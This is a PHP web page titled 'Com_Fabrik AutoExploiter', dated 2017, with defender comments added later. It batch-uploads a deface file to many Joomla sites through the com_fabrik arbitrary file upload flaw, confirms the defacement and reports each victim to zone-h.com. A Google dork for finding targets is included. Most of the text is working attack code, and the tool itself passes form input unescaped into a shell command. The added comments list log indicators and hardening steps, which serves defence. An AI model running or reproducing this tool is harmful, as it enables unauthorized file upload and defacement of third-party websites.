ustadcage_48

AutoExploiter Com_Fabrik

Dec 13th, 2017
  1. <head><title>Com_Fabrik AutoExploiter ~</title></head>
  2. <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
  3. <style type="text/css">
  4.  body { background:black;font-family: Ubuntu ; color:#fff; padding:50px}
  5. .text {width:600px;height:200px;font-family: Ubuntu ; border: 1px solid darkred; }
  6. .btn {background:#b70505;color:white;border: 1px solid #000; padding:6px 6px 6px 6px;font-family: Ubuntu ;}
  7. .btn:hover {background:#c0bfbf;color:#000000; font-family: Ubuntu ; }
  8. </style>
  9. <center> <font new size="5">Com_Fabrik AutoExploiter ~</font><br>
  10. <form action="" method="POST">
  11. <textarea class="text" name="sites"></textarea>
  12. <br>
  13. <input class="btn" type="submit" value="door" name="die">
  14. </form>
  15. </center>
  16. <?php
  17.  
  18. /** webBased By UstadCage_48 **/
  19. /**
  20.  
  21. Joomla Component com_fabrik Arbitrary File Upload
  22. Author: Et04 & bL@cKID
  23.  
  24. Google Dork
  25. inurl:/index.php?option=com_fabrik
  26.  
  27. Auto Exploiter (Auto Upload & Auto Submit Zone-H)
  28. Coded by: L0c4lh34rtz - IndoXploit
  29. */
  30.  
  31. Class IDX_Fabrik {
          /*
           * Batch client for the Joomla com_fabrik file-upload endpoint.
           *
           * For one target base URL ($url), exploit() sends the local file named
           * in $file as multipart field "file" to
           *   /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
           * and decodes the JSON reply. When the reply carries a "uri" whose content
           * matches /hacked/i, that URI is reported to zone-h.com under $hacker and
           * appended to result_fabrik.txt.
           *
           * NOTE(defender): indicators visible in this code that can be searched
           * for in web/proxy logs and on disk:
           *   - POST requests with the query string shown above;
           *   - User-Agent "IndoXploitTools/1.1" on requests sent through curl()
           *     (the follow-up fetch of the uploaded file and the zone-h POST);
           *     the upload itself goes through the curl command-line client, so it
           *     presumably carries that client's default User-Agent -- confirm in logs;
           *   - files "cookie.txt" and "result_fabrik.txt" created in the script's
           *     working directory on the host that runs this page.
           * NOTE(defender): the header comment on this page names the issue as an
           * arbitrary file upload in com_fabrik. The fixed Fabrik release is not
           * stated here -- confirm against the vendor advisory; until patched,
           * restrict access to the fileupload plugin's ajax_upload method and review
           * the component's upload directories for files nobody on the site placed there.
           */

          /* Target base URL; assigned by the caller before validUrl()/exploit(). */
  32.     public $url;
  33.  
  34.     /* Your deface file, located in the same folder as this tool */
  35.     private $file = "48.htm";
  36.  
  37.     /* Your hacker nick / your Zone-H nick */
  38.     /* Make sure your deface script contains the word HACKED */
  39.     public $hacker  = "USTADCAGE_48";
  40.  
  41.    
  42.  
          /*
           * Returns $this->url unchanged when it starts with "http://" or
           * "https://"; otherwise returns it with "http://" prepended.
           * No other validation is performed, so despite the name the result is
           * not guaranteed to be a well-formed URL.
           */
  43.     public function validUrl() {
  44.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
  45.             $url = "http://".$this->url;
  46.             return $url;
  47.         } else {
  48.             return $this->url;
  49.         }
  50.     }
  51.  
          /*
           * Thin wrapper around the PHP cURL extension.
           *
           * $url     - request URL.
           * $data    - when not null, sent as the POST body.
           * $headers - when not null, passed as the request header list.
           * $cookie  - when exactly true, cookies are read from and written to
           *            "cookie.txt" (relative path).
           *
           * Returns an object with "response" (curl_exec() result) and "info"
           * (curl_getinfo() array). curl_exec() failure is not checked here.
           */
  52.     public function curl($url, $data = null, $headers = null, $cookie = true) {
  53.         $ch = curl_init();
  54.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  55.               curl_setopt($ch, CURLOPT_URL, $url);
                    // NOTE(defender): fixed, distinctive User-Agent -- usable as a log/WAF signature.
  56.               curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
  57.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
                    // TLS host and peer verification are both disabled: HTTPS responses
                    // handled by this method are unauthenticated.
  58.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  59.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
                    // 5-second connect timeout and 5-second overall timeout.
  60.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  61.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  62.  
  63.         if($data !== null) {
  64.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
  65.               curl_setopt($ch, CURLOPT_POST, TRUE);
  66.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  67.         }
  68.  
  69.         if($headers !== null) {
  70.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  71.         }
  72.  
  73.         if($cookie === true) {
  74.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
                    // NOTE(defender): "cookie.txt" is an on-disk artifact left next to the script.
  75.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
  76.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
  77.         }
  78.  
  79.         $exec = curl_exec($ch);
  80.         $info = curl_getinfo($ch);
  81.  
  82.               curl_close($ch);
  83.  
  84.         return (object) [
  85.             "response"  => $exec,
  86.             "info"      => $info
  87.         ];
  88.  
  89.     }
  90.  
          /*
           * Sends the upload request for $this->url and prints an HTML status line.
           *
           * Output: "[FAILED]" when the decoded JSON has an "error" key; "[OK]"
           * when it has a "uri" key and the content fetched from that URI matches
           * /hacked/i, in which case zoneh() and save() are also called. In every
           * other case (including a reply that is not JSON) nothing is printed.
           * The method has no return statement.
           *
           * NOTE(defender): the request line built here (path, query string,
           * multipart field "file") is what appears in the target's access log.
           */
  91.     public function exploit() {
  92.         $url  = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
  93.         //$post = $this->curl($url, ["file" => "@L0c.htm"], null, false);
              // NOTE(review): $url is interpolated into a shell command line without
              // escapeshellarg(). $this->url is set by the caller from submitted form
              // data, so a host serving this page exposes OS command execution to
              // whoever can submit the form; treat any server where this file is found
              // as fully compromised. "@" also hides any shell_exec() warning.
  94.         $post = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$url\"");
  95.         $result = (object) json_decode($post, true);
  96.  
  97.         if(isset($result->error)) {
  98.             print "# ".parse_url($this->url, PHP_URL_HOST)." <font color=red>[FAILED]</font><br>";
  99.         } else {
  100.             if(isset($result->uri)) {
                   // "uri" comes from the remote server's reply; it is fetched and later
                   // printed without validation or HTML escaping.
  101.                 if(preg_match("/hacked/i", $this->curl($result->uri)->response)) {
  102.                     print "# ".$result->uri." <font color=green>[OK]</font><br>";
  103.                     $this->zoneh($result->uri);
  104.                     $this->save($result->uri);
  105.                 }
  106.             }
  107.         }
  108.     }
  109.  
           /*
            * Submits $url to zone-h.com's single-notification form under the name in
            * $this->hacker and prints "[ERROR]" or "[OK]" depending on the red-font
            * text found in the response. Prints nothing when that pattern is absent.
            *
            * $url is concatenated into the POST body and into the printed HTML
            * without URL-encoding or HTML escaping. $matches2 is filled but never used.
            */
  110.     public function zoneh($url) {
  111.         $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
  112.         if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
  113.             if($matches[1] === "ERROR") {
  114.                 preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
  115.                 print "# Zone-H ($url) <font color=red>[ERROR]</font><br><br>";
  116.             } else {
  117.                 print "# Zone-H ($url) <font color=green>[OK]</font><br><br>";
  118.             }
  119.         }
  120.     }
  121.  
           /*
            * Appends $isi followed by "<br>" to "result_fabrik.txt" (relative path).
            * The fopen() result is not checked before fwrite()/fclose().
            *
            * NOTE(defender): this file is a forensic artifact -- where present, it
            * lists the URLs this tool recorded as successful.
            */
  122.     public function save($isi) {
  123.         $handle = fopen("result_fabrik.txt", "a+");
  124.         fwrite($handle, "$isi<br>");
  125.         fclose($handle);
  126.     }
  127.  
  128. }
  129.  
  130. $fabrik = new IDX_Fabrik();
       /*
        * Request handler: runs when the submitted form carries a truthy "die"
        * field (the submit button). The "sites" textarea is split on "\n"; each
        * line is trimmed, normalised with validUrl() and passed to exploit().
        *
        * $_POST['die'] is read without an isset() check. No authentication or
        * CSRF check is visible in this file before the loop runs.
        * NOTE(defender): a POST to this page with fields "sites" and "die" is the
        * trigger to look for in the hosting server's own access log.
        */
  131.  
  132. if($_POST['die']){
  133. $open = explode("\n",$_POST['sites']);
  134.  
  135. foreach($open as $list) {
  136.     $fabrik->url = trim($list);
  137.     $fabrik->url = $fabrik->validUrl();
  138.  
           // exploit() has no return statement, so this echo emits nothing itself;
           // the visible output comes from the print calls inside the method.
  139.     echo $fabrik->exploit();
  140. }
  141. }